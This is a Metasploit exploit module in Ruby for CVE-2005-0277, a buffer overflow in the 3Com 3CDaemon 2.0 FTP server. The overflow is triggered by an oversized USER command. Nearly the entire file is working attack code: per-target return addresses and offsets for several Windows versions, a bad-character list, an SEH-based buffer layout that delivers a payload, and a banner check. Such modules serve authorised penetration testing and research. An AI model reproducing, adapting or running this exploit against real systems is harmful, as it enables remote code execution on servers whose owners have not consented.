1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
17
        'Description' => %q{
18
          This module exploits a vulnerability in the 3Com 3CDaemon
19
          FTP service. This package is being distributed from the 3Com
20
          web site and is recommended in numerous support documents.
21
          This module uses the USER command to trigger the overflow.
22
        },
23
        'Author' => [
24
          'hdm', # Original author
25
          'otr' # Windows XP SP3
26
        ],
27
        'License' => MSF_LICENSE,
28
        'References' => [
29
          [ 'CVE', '2005-0277'],
30
          [ 'OSVDB', '12810'],
31
          [ 'OSVDB', '12811'],
32
          [ 'BID', '12155']
33
        ],
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'seh',
36
          'target' => 0
37
        },
38
        'Privileged' => false,
39
        'Payload' => {
40
          'Space' => 674,
41
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
42
          'StackAdjustment' => -3500,
43
          'Compat' =>
44
                        {
45
                          'ConnectionType' => "-find"
46
                        }
47
        },
48
        'Platform' => %w{win},
49
        'Targets' => [
50
          [
51
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
52
            {
53
              'Platform' => 'win',
54
              'Ret' => 0x75022ac4, # ws2help.dll
55
              'Offset' => 229,
56
            },
57
          ],
58
          [
59
            'Windows XP English SP0/SP1',
60
            {
61
              'Platform' => 'win',
62
              'Ret' => 0x71aa32ad, # ws2help.dll
63
              'Offset' => 229,
64
            },
65
          ],
66
          [
67
            'Windows NT 4.0 SP4/SP5/SP6',
68
            {
69
              'Platform' => 'win',
70
              'Ret' => 0x77681799, # ws2help.dll
71
              'Offset' => 229,
72
            },
73
          ],
74
          [
75
            'Windows 2000 Pro SP4 French',
76
            {
77
              'Platform' => 'win',
78
              'Ret' => 0x775F29D0,
79
              'Offset' => 229,
80
            },
81
          ],
82
          [
83
            'Windows XP English SP3',
84
            {
85
              'Platform' => 'win',
86
              'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
87
              # 'Ret'      => 0x775C2C1F,   # 775C2C1F JMP ESP shell32.data SP1
88
              'Offset' => 245,
89
            },
90
          ],
91
        ],
92
        'DisclosureDate' => '2005-01-04',
93
        'Notes' => {
94
          'Reliability' => UNKNOWN_RELIABILITY,
95
          'Stability' => UNKNOWN_STABILITY,
96
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
97
        }
98
      )
99
    )
100
  end
101

102
  def check
103
    connect
104
    disconnect
105
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
106
      return Exploit::CheckCode::Appears
107
    end
108

109
    return Exploit::CheckCode::Safe
110
  end
111

112
  def exploit
113
    connect
114

115
    print_status("Trying target #{target.name}...")
116

117
    if (target == targets[4])
118
      buf = rand_text_english(target['Offset'], payload_badchars)
119
      buf << [ target['Ret'] ].pack('V') * 2
120
      buf << payload.encoded
121
    else
122
      buf = rand_text_english(2048, payload_badchars)
123
      seh = generate_seh_payload(target.ret)
124
      buf[target['Offset'], seh.length] = seh
125
    end
126

127
    send_cmd(['USER', buf], false)
128

129
    handler
130
    disconnect
131
  end
132
end
133

134